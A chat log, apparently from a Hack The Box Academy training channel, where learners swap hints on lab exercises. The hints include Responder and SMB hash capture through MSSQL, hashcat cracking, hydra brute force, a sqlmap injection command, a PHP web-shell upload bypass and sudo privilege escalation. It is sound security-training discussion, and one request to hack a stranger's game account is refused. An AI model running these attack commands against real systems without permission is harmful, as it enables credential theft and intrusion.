#modules
simply the rsa id file was damaged, I redid it and i have completed the form
yuuuuhuuuuuu
big satisfaction
follow Pentester/Bug Bounty Hunter/SOC Analyst path based on ur interest?
Hello, im stuck in the ATTACKING COMMON APPLICATIONS module at the Attacking GitLab content, at the question Find another valid user on the target GitLab instance. I tried the bash script and the python script , i found several users , no one match with the question .. i tried all the wordlist from seclist/username, im pretty lost if someone could help me thank !
Yeah I started the linux fundamentals but when it got to the point where some commands looked like this "grep -Po "https://www\website.com.*?(?='|")" I started to get confused how often would I use a command like that?
regex? yes you will use it often as a professional
But as a beginner will I use it often? Are there any other outside resources that will help me understand regex a bit better?
don't think about it too hard, use available resources like regexr.com
hell use chatgpt to suit your regex needs as beginner
hello! I'm on the service enumeration module with the question "One of the services contains a flag you have to submit as the answer". I found a flag htb{<flag>} when I used "nmap -A <ip> --packet-trace" but it rejected the flag. Is that the right format of the flag?
Okay thank you for the information I really appreciate it
try cirt-default-usernames.txt
thk i'm trying...
does not work
found root and 1 other invalid username..
Could the module be broken ?
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5 nice blog post!
Let's talk about pivoting in the context of ethical hacking. In the simplest of terms, pivoting entails moving deeper into a network that…
i did it in 2 minutes just now
the problem was caps
ok great
lost 1h on it, feel really dumb
thanks, get on the ligolo train if you haven't yet, it's the best!
You just have that every now and then. But just never give up!
yeah, much better than the tools that academy shows
just tried today, such a good tool
it's important to know all the options, but I haven't used anything but ligolo since lol
you're famous 
SEO is magic
?
Does anyone know how to find the flag in the service enumeration module for nmap? I accidentally found the flags ahead but not this one
You won but at what cost ?
I still can't figure it out
what nmap command did you try for service enumeration
nmap -A <ip> --packet-trace and -sV for each port. I went into tcpdump to see each packet and response when probing with nc too
check dm
I got really annoyed having to check for file transfers one by one on the Active Subdomain Enumeration module so I made this quick little script to do it for me if anyone is interested in it or improving upon it.
#!/bin/bash
# Check if the correct number of arguments was provided
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <nameserver> <domains_list_file>"
    exit 1
fi
# Assign the first argument to NAMESERVER and the second to DOMAINS_LIST
NAMESERVER=$1
DOMAINS_LIST=$2
# Check if the domains list file exists
if [ ! -f "$DOMAINS_LIST" ]; then
    echo "Error: File '$DOMAINS_LIST' not found."
    exit 1
fi
# Loop through each domain in the list and attempt a zone transfer.
# Arguments are quoted so entries with unexpected characters are not word-split.
while read -r domain; do
    echo "Attempting zone transfer for $domain on nameserver $NAMESERVER:"
    dig axfr @"$NAMESERVER" "$domain"
    echo
done < "$DOMAINS_LIST"
Delete if it is considered a spoiler
Would also like to know if there was already a tool I could have used lol
When logged in as local admin, how do you extract the password, or the hash (rc4 | aes128 | aes256 | des) from a user using only Rubeus? The goal is to use the results in an asktgt command.
btw the ||bash|| cmnd is not blacklisted
You can also use -f flag with dig, it basically passes the file with subdomains
It looks like Brute-Force is the only way.
Thanks, I knew there had to be a more simple way
can anyone help me to understand the difference
it work normally
in terminal? can you share the output?
yeah but where is the $ here in the second command
I'm sorry are you saying that my command works normally or your command?
is someone available to talk in DM about note taking & reporting please ? I am a bit lost with the suggested way to do note taking. While I think I should use the provided "template" for note taking, I don't understand where I may store my currently "live stuff" (I mean what I am doing atm). I am used to just screenshot / copy paste my term log almost all the time I do a step forward and I don't understand in which part of the obsidian folder tree I should store this
what is your question here?
read the error carefully
is it oki to dm you
i was using the same cmnd just removing the ||bash<<<|| that's all and like i said normally it executed on my terminal
sure
Hello everyone,
I'm doing the password attack module and when i try to do the first winrm command i get an openssl segmentation fault and i'm unable to connect to the target...
Anyone knows how to fix this ?
Post a screenshot.
Not sure if you are running into the same thing, but I had to make changes to /etc/ssl/openssl.cnf
[provider_sect]
default = default_sect
legacy = legacy_sect
[default_sect]
activate = 1
[legacy_sect]
activate = 1
my bad not a segmentation fault..
but still openssl
that user might not have psremote rights
which section is it?
network services
yeah that's what i thought,
so the problem is from my parrot i guess
i tried resetting the target and i got the same error
i'm gonna try again tomorrow
nothing
that's strange, try reinstalling both?
hey i'm stuck on the Service Enumeration nmap module. The challenge is "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer."
I tried the following:
nmap -sV -p- -vv <ip>
nmap -A <ip>
- proceeded to review ALL THE TCPDUMP OF THIS (Found the flag of the next module)
- I tried nmap enumeration scripts for each protocol
- netcat -nc to probe the ports manually and see the response using tcpdump
You'll need some patience, as the correct port takes a minute to give you the answer

i remember this one lol
Password attacks is worse for patience
It's really as simple as just waiting
You'll get 220 HTB{FLAG}
220 is the response code (which you'll leave out)
I see I see
Idk what it looks like in tcpdump
Didn't do that portion
Also if you are, don't forget to specify the tun0 interface
yep yep I did it on tun0 :D
guys iam at the basic tools module I really dont know how this works
Gonna need to be a bit more descriptive
yes I wanted to send an image but couldn't send it
see community help
The 8 hours listed for the Password Attacks module is really hurting my confidence.
i'm in this section: https://academy.hackthebox.com/module/136/section/1289
i found the extensions that are passing through the white list and the black list but they're not being saved properly
Protip: ignore that number
some modules took me super fast to finish while most modules took me forever and way longer than the time they stated
Try saving it as .jpg.php or something
And what happens when you do ?cmd=whoami
Hey!
nothing happens
Any hints on how to start the Attacking Common Services SQL lab?
I've authenticated with the user and password provided by the lab, and I am using mssqlclient.py from impacket.
The question is asking for "What is the password for the "mssqlsvc" user?"
I got into msdb with the command:
SELECT table_name FROM msdb.INFORMATION_SCHEMA.TABLES
Don't know where to go from here.
USE <DB name> to use a DB, SELECT * FROM <DB Name>.INFORMATION_SCHEMA.TABLES to get tables in a DB, SELECT * from <table name> to get table contents
i don't know if i can ask this or not, I have been following some writeups and in those writeups it is supposedly allowToDelegate, but when i try it it's always ReadGMSAPassword, i have followed the instructions exactly. do you know why? is it because i am on a different time (skew clock)? can anyone help with what my mistake is?
I've tried that for multiple databases in the module.
I've figured out the commands, but the main two databases are password protected
Or so it seems
maybe then you should try another way of getting the password, try the other steps in the section
look up how to sync kerberos clock
I tried responder, it just hung on listening.
because you need to make the target connect to it
how?
I only have access to the IP given in the module
the same section as where they mentioned responder: Capture MSSQL Service Hash
sudo impacket-smbserver share ./ -smb2support
is unresponsive
this didn't work
I got this:
check the section I mentioned again, there are 2 procedures that you can use to force a connection to your responder
Steal the hash
Then you didn't try hard enough
there are 2 procedures
^
Are you sure the long output didn't contain a hash?
I'm sure
Take a long look at the output in responder. If it starts with mssqlsvc
That's the hash
I don't see that
I think my starting point is wrong. Where do I start. I'm authenticated, then what?
Did you run responder on the right interface? Make sure to double check.
I dont recall that question being difficult, I remember needing to do a bunch of nonsense at one point
But can't recall what lab
capturing the hash is right
I ran it on tun0
Show output responder gave
then what's the long output? responder showing the server status?
So when you ran the xp_subdirs it gave nothing?
Bc that's just the launch for responder telling you it's running
Which you then launch the xp_subdir command against
That one just hangs
Can you show the xp_subdir command that you're entering
it's not hanging, it's listening for a connection, like I said, it can't capture hashes unless you force the target to connect to your listener
So I start the impacket-smbserver first?
yes, and either smbserver or responder will work
rtfm
I thought this was an SQL share, not an SMB share
I guess I should clarify, SQL database, not SMB share
Now I am very confused
...
You would need to work back on the basics, do some research on SMB Shares.
Having either listeners (responder/smbserver) running on the background and making the database authenticate to your listeners ip should completely work.
Xp_subdirs allows you to read smb shares
That's LITERALLY what you're meant to do
(the procedure is the other one in the section, idk if they've tried it...)
It's literally in the section @next bronze talked about
They show it weirdly out of order but explain it in order
So am I trying to use SMB or SQL?
I swear to fuck
Both?
Responder creates a false smb server
That you call to from the sql query
Just looking at the examples is generally not gonna be enough
Because you need to read the context
It's actually explained
so I am in the SQL server with mssqlclient.py
Adm
now I have to use SMB?

Too much lol
@next bronze was nice enough to screen grab the part that explains it
But holy fuck dude
Take your time and read everything, everything you need is in the module.
Like I get it if this was about the impersonation thing because that was a pain in the ass
But this is the easiest method of attack
What impersonation thing?
Don't worry
I got the creds from the lesson prompt
Oh great, I can't wait
I'm not failing, I'm learning
You're failing to read
and you're helping, thank you
you're using the stored procedure to make the SQL server access a file on, using \\<ip>\ means the target will try to access using SMB, that's how you can capture the hash
Because it's literally explained in the section
Which @next bronze just copy/pasted
also @ whoever deleted the screengrab, am I not supposed to post screenshots of the modules?
Probably a mod bc spoiler of paid content
whoops my bad
¯_(ツ)_/¯
He wasn't getting the point anyway
Like trying to drive a nail with a screw driver
It'll probably eventually work
It's just so hard to piece all of this together, it would be nice if there was a walkthrough.
Sir
Respectfully
Fucking read the part about stealing hashes
Actually fucking read it
Because this is not some sort of rocket science
Fuckin reason we have instructions on shampoo bottles
the module itself is the walk though, you're supposed to use what you have learned to complete the exercise
This 100% isn't one of those times you need to do outside research to figure it out
like if it was something that needed that extra bit of Uncle Google or Auntie GPT to understand then I get it, but no - it's right there
Is there a way to do this in mysql even though it's MSSQL?
i swear some of these questions are basic comprehension 🤣
no, and I suggest you revisit the foundation modules like windows and linux fundamentals, if you're confused about this, you might not have a solid grasp of the operating systems, services and protocols
is sql covered in that?
read it again but slowly
no but like, MSsql and sql, different eco system
literally all you gotta do is what it shows you to do
run Responder, use xp_dirtree or xp_subdirs
and THAT'S IT
yeah i got that, was just curious if sql was covered in those sections
i didnt do them
https://www.exploit-db.com/exploits/46635 how to do this with sqlmap
i know i can just use this script but i wanted to try with sqlmap, but how much ever i try, sqlmap doesnt detect this sqli
what module is this regarding?
its from a machine but ig it relates with sqlmap module?
|| sqlmap -u "http://10.10.10.138/writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5" --technique=T -p m1_idlist --dbms=mysql --prefix '))' --suffix '+--+' -v 3 --batch --tamper ./space2plus --no-escape --delay 2 --skip-urlencode --time-sec 10 --level 5 --risk 3|| is what i tried but it says false positive or unexploitable even though it is exploitable
i think sqlmap doesnt have capability to use select sleep() from query
This is the modules channel
ask in #boxes
ain't no way u jus said that bruh
gave me a good laugh, hope you figured it out though
hey guys, in "Attacking Common Applications - Skills Assessment I" last Q :
"...contents of the flag.txt file on the Administrator desktop"
neither the type command nor any other command works to get the content of the flag.txt
I can see the flag and its location but I can't see its content ...
any hints please ??
if it's a windows host; have you tried type filename?
yes, the type gives an empty page
and the dir show that directory again
i mean dir doesn't read files
what?
the dir command shows the directory and the type shows an empty page.
that's why I wrote that I can see the directory of the flag but I can't see its content ....
that's odd and you're on the right Administrator host yeah?
if you're rdp in, can you click it on the desktop?
ok I think I got it, I just need to find hardcode paths ...
yes
of type I think...
not sure I got it
which directory??
what's the current directory when you tried to read the flag? not the flag directory, the directory you're at
U mean write my current directory with the type command and then the path to the designated file right?
type c:\users\administrator\desktop
yeah that didn't work 4 me ...
that's cause you can't type a directory...
ofc, it's the directory path that's in the command, I'm just pointing out the correct path
Having trouble with the "Enumerate the flagDB database and submit the flag as your answer" I have the || password of mssqlsvc, but I can't log in using either mssqlclient from impacket or sqsh||
basically, if the file it's not in your current directory, use absolute path for situation like this
Am I supposed to use || IMPERSONATE|| or something?
And I'd try something different. Such as maybe a CVE for the web server.
No one can help if you don't provide the Module+Chapter
Module and section
Attacking common services module, the Attacking SQL section
Question 2 I assume? If so, no. Just sqsh and look through the tables.
sorry I don't understand
I think I did mention the full path to the flag directory ...
Unfortunately sqsh tells me I don't have the right password
Password should be the answer from Q1
That's why I don't understand why it doesn't work
I guess I'll try restarting the machine
You should have stolen the hash and cracked it with hashcat
Yep
what's your sqsh command?
|| sqsh -S IP -U mssqlsvc -P 'princess1' ||
Ohhhh
it's absolute vs relative path, works the same in windows and linux, look it up if you're having problems understanding
the newer sqsh doesn't use that anymore
I did the module over a year ago.
That worked though
MSSQL login use that .\\ as a prefix so that it knows its referring to a local account, rather than an AD account.
No query is working atm, but at least I logged in
the thing is that I solved this already but I don't remember having these issues with it before ...
ah right
I got a shell on the box by exploiting a CVE, and did it that way
someone ??
huh? didn't we already explain, if the file is not in your current directory, use absolute path
can I DM?
I did use absolute path ...
Does any one else have trouble with the website clearly not allowing correct answers?
every time i enter the answer into the box, it just says sorry incorrect. though it is clearly a correct response. ive tried multiple ways of capitalization, and yet it wont accept it. but there is literally no other answer it can be. there are two issues, any one know how to resolve these problems?
No
There's a few instances where the syntax is finickity, but as a whole, the answers are right or wrong
Most common problems are where you paste an answer, and forget to remove some whitespace from the beginning or end
pretty hard for something as simple as a hostname to be incorrect. ive been using linux for 20 years and decided to take some of the modules, but its not off to a good start. no variation typed or not typed will it let my answer correct
Which module/section/question?
/module/18/section/70
None of those questions ask for the hostname
spawned the machine. used uname,and all its individual flags still no avail. sorry meant hardware name
Try ||uname -m||
seems to not want to go through its only x86_64 but just denies me lol
The hint literally tells you to use uname with an option and the question defines what the exact matching switch is needed. If that isn't working, then you've got a whitespace/keyboard issue, or you need to contact HTB support.
Hi Team, during skills assessment(shells&payloads) , connection from pwnbox to a foothold box keep dropping. And, connecting through vpn is extremely slow. Please suggest any recommendation.
Try pwnbox?
alright ill contact them, ive used the uname commands and supplied it with pretty much everything it had in parts full, and all lol, seems to be an issue, its not the first one ive had, could spans machines yesterday, now i can, no idea what that was about
figured out the issue :/ just read on a post, its a javascript thing, i enabled it through uBlock, somehow or another it was disabled from loading. probably me accidentally clicking that particular filter when i updated it last. but it had accepted the answer i just got a funky result. as when it reloaded, it updated as correct and i could not click it again, so theres that if anyone else has that issue thats the problem in my case
hey quick question: why would i turn off the dns resolution in a nmap scan? will the scan be quicker/stealthier? and is it on by default?
When connecting to telnet service via smtp port 25 ...
when entering credentials, is this the format:
telnet ip_address 25
USER username
PASS password?
hello i have a question regarding academy annual subscription, where should i ask it?
SMTP uses different authentication.
Thanks, I figured it out
does **"Direct access to all modules up to (including) Tier II"** mean that I don't need to pay cubes for modules that are tier 2 or less? @me
From pwnbox it keeps dropping.
Yes, they are included in the subscription
thx
If its dropping on pwnbox as well as on the VPN, I'd restart everything
@pine dagger sent you a DM, hope its ok.
Okay Thanks.
Hi I am doing the Linux fundamentals and for some reason I am getting this pop up
I think thats pkexec. starting service requires higher privilege
try sudo systemctl start ssh
Nice it works thank you
Btw anyone here working as pentester/bug bounty hunter without studies/university? Is it even possible?
did you figure it out?
I am but only freelance stuff
not really I tried to move on
to the second assessment (got a bit trouble there as well)
the "enjoyable" part is that I did it already, I'm trying to make my some notes
in "Attacking Common Applications - Skills Assessment II"
when I try to use "gitlab_13_10_2_rce.py" I get:
[1] Authenticating
Successfully Authenticated
[2] Creating Payload
[3] Creating Snippet and Uploading
[-] Exploit failed
dm if you need, though I've already explained all I can
what makes you think that it's vulnerable to the RCE?
Guys, I'm having some difficulty on "Stuxbot - INTRODUCTION TO THREAT HUNTING & HUNTING", in finding what is the name of the "famous powershell hacking tool!" D: Can some one give an hint or some assistance?
"Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___ "
found a lot of code in the field "powershell.file.script_block_text", and pasted some parts in a search engine, but could not find any correct powershell tool, only a whole lot of spare scripts...
Hi guys how can i read flag 4 from linux hardening Linux priv esc module please?
try to understand a little on what the tool does, then search according to its functions
there's no flags in that section
yes there are 5 flags
what's the name of the section
skills assessment?
Yes
that's not hardening
Yes sorry
what have you tried?
Hello everyone, Im on the IPMI module in Footprinting and I am having trouble cracking the hash
I'm so lost hahaha After so many days ... xD Reviewing the module did not seem to help!
guess I will bang the head some more...
probably the lack of PS knowledge.
google how to access tomcat manager
anyone that could help me with that. So Its -m 7300 and then I have the hash from ipmi_dumphashes.
Now Ive tried basically every different format and hashcat just wont take it
it's used in active directory post exploitation reconnaissance
UR right that was a stupid assumption I made
Can't thank you enough ❤️
good job
Obfuscate the flag. If you got it from blind-sql injection, then you'd need to run it again.
Why can't I get the flag on kali machine?
it will go blank
I get it from my pwnbox
What is your sqlmap version?
it should work, I did everything from kali
Can somebody help me with Attacking Thick Client Application. Upon modifying the bat file in the tmp, and running the bat file only oracle.txt is being created in ProgramData
you mean reset the target and run it again?
no.
with the whole modules or the exam?
Plenty
Like about 4-5x more than have the cert have finished the path
Make sure no weird spaces
If you copy/paste
Should probably delete since spoiler
Hey guys I need help with the attacking common services skills assessments, can I dm anyone?
@hallow kiln can i dm? AD module skill ass 1
im a little stuck on the web attacks skill assessment i managed to find the uid of the admin user so im trying to login as the admin via an idor but not sure how i intercept the request and change the uid but nothing changes any help if you need more detail i can provide it just trying to avoid spoilers
I'm a bit stuck in the Windows Event Logging Basics section of Windows Event Logs. The second question asks to craft an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer. Is anyone available to assist with crafting this query? It's odd that such a question would be in this course so soon without any XML language modules prior to this.
sure, go ahead
nvm got it
No one is giving any help
Just ask your question here, then there is a good chance that you will get help
yeh go and ask your question i will try to help you
and which attacking common services are you talking about the first or the second one ?
Hi, do you have this error on this module : Footprinting / Oracle TNS?
┌──(kali㉿kali)-[~/odat]
└─$ sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package oracle-instantclient-basic
E: Unable to locate package oracle-instantclient-devel
E: Unable to locate package oracle-instantclient-sqlplus
That looks like an apt issue itself. Have you tried sudo apt update?
Yes it works for this error:
404 Not Found [IP: XXXXXX 80]
Err:2 http://http.kali.org/kali kali-rolling/main arm64 debhelper all 13.11.6
404 Not Found [IP: XXXXXX 80]
Err:3 http://http.kali.org/kali kali-rolling/main arm64 python3-pip all 23.2.1+dfsg-1
404 Not Found [IP: XXXXXX 80]
Err:4 http://http.kali.org/kali kali-rolling/main arm64 python3-pip-whl all 23.2.1+dfsg-1
"Oracle TNS" gives me a lot of trouble
Never mind. I figured it out ChatGPT is your friend!
hello guys im struggling with the last privesc in getting started ---> knowledge check
i ran linpeas and found out some suid files i tried to look how to exploit these files with gtfo but nothing works
Anyone do the Intro to Whitebox Pentesting: Code Review - Services? Asks for full route for the endpoint linked to generateQR function -- maybe I'm completely misunderstanding the question, but not only trying what I thought the answer was (along with everything else I could come up with) has failed me. Please DM. Thx.
Not necessary
If it's not something simple: it's wrong @crystal steeple
linpeas shows a lot of things
Doesn't mean they're all right
Did you try just doing sudo -l
That's all you need
but i couldnt overwrite it
You don't need to overwrite it
wait
It's an application
my brain stopped working
when i ran that , i got a blank page which i can write anything there
ye man im done
i did all that i tried idk if im doing things right
i checked for everything you said before i asked but nothing works 10000% im not using right commands in right places
and then i get that blank page
i followed commands in gtfo
and paste them there but nothing happened
The command in gtfobins is pretty straightforward
you can sudo with php right? follow the commands in the sudo section
yeeep as i said i was pasting commands in a blank page
now its worked and got root lol
thanks guys !!
I dont understand from where to stand i'm familiar with CTFs but i see in the HTB there are so many paths, Where should i start?
Just From Machines?
I've done a lot of labs and CTFs not in HTB, On other platforms, But here i can see there are so many, Machines, Challenges, Sherlocks, Academy, What to choose lol?
Just start with active machine?
do whatever that interests you, if you already have experience with ctf, the active boxes are indeed a good place to start
What about the Starting point?
I dont really get this
I'm in tier 2 in the "Starting Point" What comes after?
I can see on the left tab
Starting Point
Open Beta Season III
Machines
Challenges
Sherlocks
Tracks
Academy
So Seems like the most relevant here is the Machines section am i right? Just start from easy mode? What are the differences between ACTIVE MACHINES and RETIRED MACHINES? seems like the RETIRED MACHINES has much more LABS,
retired machines have writeups and dont award points
active machines dont have writeups but do award points
points like a video game hiscore
pride and accomplishment
Ok, So how can I know that a retired machine is relevant (or irrelevant) because it's "retired"
I know everything is relevant... even log4j lol
So you suggest to skip the Starting Point and go right away to the Machines?
what do you mean by relevant?
Not updated, too old
if you find starting point easy then skip it
you can order by release date
Starting point is until Tier 2 am i right? (right now i'm on tier 2)
but they are CTFs so they will have you doing things you (hopefully) shouldnt see all too often in the wild
shouldn't see all too often in the wild? what do you mean?
like CTFs have customized scenarios that are meant to make you think more than on a regular assessment
This isn't related to academy
hack the box has many realistic boxes but also some are more just fun and interesting challenges
There is a #starting-point chat
You need to verify/link your account following #welcome
So how can i determine what is more realistic and what is less?
Why
We can speak here for now
This isn't the place for this conversation, this channel is for discussion about academy content
them's the rules
Not main platform
Oh yea seems like I have done shit like that before
something really easy took me entire day
of searching and wambling
You get told "hey this is the goal, good luck" in main platform it's 2 flags, user and root
without any guidance
For academy it's the skill assessment at the end of a module
Machines often have a combination of faults related to the academy modules in Academy X HTB page
But it's not like you'll have all the info just from doing the modules
Oh so there is a related machine CTFs after each academy module
Just gives you a stronger base
Not really ctfs just retired machines
I've already completed eJPTv2 so i think that i dont really need academy
wrong
Yo ! I wanted to ask if I'm thinking correctly.
Footprinting Lab Easy, question: Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
Ports 21 and 2121 are open, they provided credentials for user name ceil.
Im trying to dwnl files using wget command, however it seems that its always failing due to connection time out.
Its just broken or using wget is not a solution ?
machines take a lot more than 1 module from the academy. but you can check if content from the module is related to a machine
eJPT is super basic compared to what's on Academy
ejpt is nothing compared to the content in the academy
Wget uses port 80
Web-get
You need to access the ftp server you have a username, now get a password
So If i pay for "VIP" it's include the academy in?
Vip is separate
Academy is a separate platform
Oh
^
But are you l337 enough to take on the ultimate hacking test... CEH? /s
Well they are providing both username and password. But now im not sure if they are valid for SSH or both
but you can have a few weeks of content in academy before reaching the point where you actually need to spend money. if you concentrate on Tier 0 modules
...
You have a valid port for ftp
Poke around on ftp
Specifically the alt port
kk, thx
Start with known info always
actually i'm 4 years developer and Computer Science+CYBER SECURITY graduate, But i've heard about CEH It's really advanced
It's a meme
Oh
why?
ceh is just multiple choice questions
Or compared to something else
how can you learn pentesting from that
so what you can compare eJPTv2 to ?

PJPT is a lot more practical
eJPT is just something to get your feet wet and see if you're interested
I dont really care about the certification, I care about the knowledge
if you care about knowledge, CPTS is what you want
there is plenty in the academy. just look through it.
If you only care about knowledge don't do any certs lol
Yea I learnt from INE academy shitty course haha
But you need some motivation after all dont you?
if you want a benchmark, do an easy/medium box and see how far you can get
I added the /s tag as I was being sarcastic. You passed your eJPT -- that's fantastic -- celebrate the win. But if you truly are that unaware (as your response to me suggests)... I truly feel bad, as you are blissfully unaware of how little you truly know. That said, keep on keeping on, as at the end of the day, we truly know little -- it's just having the self-awareness to know that we know nothing vs. the ignorance to think we are that good.
My motivation is learning, if you need external pressure that's on you to pay for it.
Seems like it will be hard enough for me, I think that medium is the maximum for now
try it out, active boxes are free and don't come with write-ups
with respect, I have ejpt, and I'll be very surprised an ejpt holder can do an easy box without problems
So just go for the Machines Section?
Ok i trust you
and depends on the box, Linux box it's easier for me (because of my experience as developer)
Lol nice
You're giving me good advice (for real)
Finally got the hash on the attacking common services SQL module, but -m 1000 mode on hashcat is saying no hash loaded.
What type of hash is this?
Net-NTLMv2
Seems like there are retired machines easy level for free
read the section please, it tells you there
entirely different thing from NTLM
but yeah, the section explains it including which hashcat mode it is
all active machines are free (but you are on a shared vm with others, so there might be left over exploits from other users). Just try some of the active machines and see how you feel before jumping into VIP and retired machines
But in Pentesting there are many fields, Even for CTFs, There are WEB pentest and network pentest and server pentest and many more, I should choose my field, shouldn't I?
Didn't you say you were a cybersecurity graduate?
you should be decent at all fields then specialise into one if need be
It says NTLMv2
Yes, Low level reverse engineering field BOF and shit
That's mode 1000 right?
code research
No, 1000 is NTLM
What's your favourite disassembler?
if you want something more specific look at the challenges, they have some for reversing or the web section has you read the code of a webapp and find a vulnerability you wouldn't otherwise find so easily
again the active challenges are free, the retired ones require vip
We've used gdb
The Art of Software Security Assessment: Identifying and Avoiding Software Vulnerabilities. By Mark Dowd, John McDonald, Justin Schuh. Addison-Wesley, 2006
and cryptographic
Hi is it possible to get some help on this please, is this broken?
pretty sure that's not a disassembler
but yeah, good luck on your journey
Okay, found it NTLMv2's mode I think. -5600? Do I use the whole thing or take out the username and domain?
whole thing as you see it
im doing linux buffer overflow right now and it uses gdb for disassembly
Okay, maybe 5600 wasnt correct? Hashcat shows status "exhausted"
huh how is gdb not a disassembler lol
🤷‍♂️
which list are you using?
i did not use any "known disassembler" (just like ghidra) I've just exploited vulnerabilities in code just like BOF and jumping to critical sections in a code, Override vptr in C++ code and etc...
The one in the resources for the module
thats right
pws.list
try rockyou
So there are reverse engineering or BOF challenges in HTB too?
I didn't use rockyou, but it's probably in there
gdb can show disassembled output but it is not a disassembler afaik
challenges > reversing
Yeah, that worked, it wasn't in pws.list
The Ghidra is the real disassembler for reverse engineering afaik
I've got two lists from that module, one was found somewhere else
@rustic sage So HTB has this kind of challenges too?
@wet kite this question directed to you too
Dunno, did all my work for RE on offsec, I'm sure others can help you better wrt HTB content.
So I got the password and it worked as the answer, but it's not working to log in
lol didn't I reply challenges -> reversing
are you using windows authentication?
yeah, academy has some modules on it. BOF and assembler code. Also the challenge section in HTB should have something like that, didn't look into that one much so far.
No, I'm using sqsh like I did for the supplied credentials
Am I supposed to RDP or something?
What do you mean by challenges -> reversing? Sorry for misunderstanding lol
You might have to supply a flag like -windows-auth or something
htb platform, challenges section, there are specific reversing challenges
and the pwn challenges also has bof
Wtf so now I have Machines section, And Challenges section, What should i use
Oh wow
like I said, do whatever interests you
I never use that, tbh, mssqlclient.py is my preferred choice and it's better imo
it also depends on which area you want to learn, do you want to continue on what you already know? or learning new things
Oh so in Challenges section you can determine by type of what kind of challenge you would like to complete, Those challenges are the same as we have inside the Machines section but it's just arranged and sorted by subjects?
challenges only has one flag, and it's usually shorter than a machine, you get a docker container to hack instead of a full os
"Challenges" Section has the machines inside the "Machines" Section just sorted and arranged into subjects?
Oh so it's different from Machines, Ok...
Can i arrange the Machines by subjects too?
Login failed there too
In the Advanced XSS and CSRF Exploitation skills assessment, should I be able to log in? It logged in fine for me a week ago but now its not...
only for retired machines, use advanced search to choose the area of interest
did you use the -windows-auth flag? cause otherwise it defaults to kerberos
I do vaguely remember that I had to use sqsh, not too sure tho
Damn, that helped a lot
I have it in my notes, I used mssqlclient, but I'm sure sqsh can be used as well
ah ok then I guess it's skill issue
So i can see there are many "low level" challenges there
Okay, that worked. Did I miss something in a previous module?
think it's time to move the chat to somewhere else, this channel is used for academy module topics
it's in the footprinting module, if not directly in the attacking common services
Thanks man
if you get verified and want to continue the topic, drop me a ping
Cool, found it, thanks!
Do you remember where? I have been looking for it. Trying to figure out how I missed it.
the section on MSSQL
near the end
OK. Haven't got that far yet:
--local-auth is not just limited to mssqlclient.py btw, it's available in most impacket tools that use windows auth
footprinting, not the SQL injection modules
Also CME/NXC.
oh wait, sorry mate, you were referring to an entirely different thing
lol. All good.
based on a quick search in my notes, it appears the first time we see it is in the Password Attacks module
Frustrating. It looks like I didn't miss it then it is just not mentioned.
you haven't done that one?
sometimes you just gotta read the manual
I am on hard right now and needed it.
thanks.
which module, sorry?
password attacks. The hard exercise.
then yeah, it is mentioned in that very module
Do you know where?
I have searched and come up empty.
Thank you!
you're welcome
I got the flag, fun fact sth was wrong with my target or sth. I used the pwnbox and it worked. Btw u can use wget command and specify port other than 80 bro
Why did the flag show up like this?
b'HTB{SPOILERS}'
that's what the whole thing looked like with "SPOILERS" to replace the actual flag
what is the b' ' ?
This is for the SQL flag in attacking common services
Hi, I have a bloodhound question : Documentation & Reporting Practice Lab, I observe a weird behaviour:
After running bloodhound-python (as Domain Admin), I cannot find the relationship that link Remote Desktop Users group on DEV01
This information seems to be potentially visible through bloodhound since it is written as a Finding in the obsidian folder.
I have run multiple times bloodhound and don't get this info.
Any idea please ? would this be a limitation of bloodhound-python ?
the b' is a string representation in python (sqlmap is coded in python)
It is bytes, not string.
did you try with sharphound
No, was thinking about trying this tomorrow in bed now :D) thanks for the suggestion
I've run into instances where bloodhound didn't get all the edges
Anyone have any hints for the Tapping in to ETW section in WINDOWS EVENT LOGS & FINDING EVIL?
opa
I need someone to hack someone for me, she stole my account, and I don't really understand that
What have you tried and what is not working?
Contact the local police station
bru, ok, thanks Bro
It was a game account, I don't know if you can help me
it was on roblox
Read #rules
Contact Roblox Support and the local police
Nobody can do anything for you here
what you're asking for is illegal, no one's going to help with that
I've tried running the SilkETW in conjunction with SeatBelt as the module shows, and when I open the etw json file, there's nothing ever there that corresponds with what the question is looking for.
Search for ManagedInteropMethodName in this json File
Yep, I've done that and I can't find anything that conforms to what the question is looking for. I just respawned the instance to see if I might have misconfigured something.
Hello Everyone, I'm new to the crew (cyber). Going through information security skill path on HTB !
Getting an error on Attacking DNS from Attacking Common Services module
I already used subbrute, but the dig command is not working.
the @ should be the ns
there was only hr.inlanefreight.htb
is inlanefreight.htb the nameserver then?
I have it backwards?
do you think hr will be a nameserver?
guys any hint in this im stuck here Submit the number of all "A" records from all zones as the answer. footprinting module
I figured it out, my command was backwards
nothing more annoying than being halfway through a skills assessment and the Pwnbox instance running out of life sigh
hi I'm still on the last exercise of the intro to nmap module. I started taking notes of the whole module again from scratch but I am wondering if I should just look at a walkthrough of the module or read through the whole module again straight through. I watched an entire YouTube playlist of Nmap by hackersploit so its just a thought.
what do you think?
I have been on the last exercise of the Nmap module for weeks and forgotten a lot of what I have learned.
but I don't want to cheat because I want to learn
is there a walkthrough by section so I can relearn everything from previous sections in YouTube video and just skip the walkthrough for the last section?
is it a bad idea to do a walkthrough of it?
The target IP is the nameserver
yes, try brute forcing a different service not ssh
hydra -l kira -P mut_password.list ftp://10.129.43.39
i mutated it with best64, just renamed it to something else
mutate it with the given resources
Also, I believe there was a hint about the password just mutate the hint or words related to it, it will decrease the time taken to brute.
Use the rule given in the resources to mutate that list the password has a 0 in it
hashcat --force password.list -r custom.rule --stdout > mut_password.list
i am dumb lol
thanks!
You're not dumb, we all deviate from the resources/modules from time to time. Every time I've been stuck or hit a roadblock, the answers are always in the materials
oh ok
And make sure you write all passwords you find down because iirc there are a few credential reuse questions
Are you talking about the Hard Lab?
hi
anybody here?
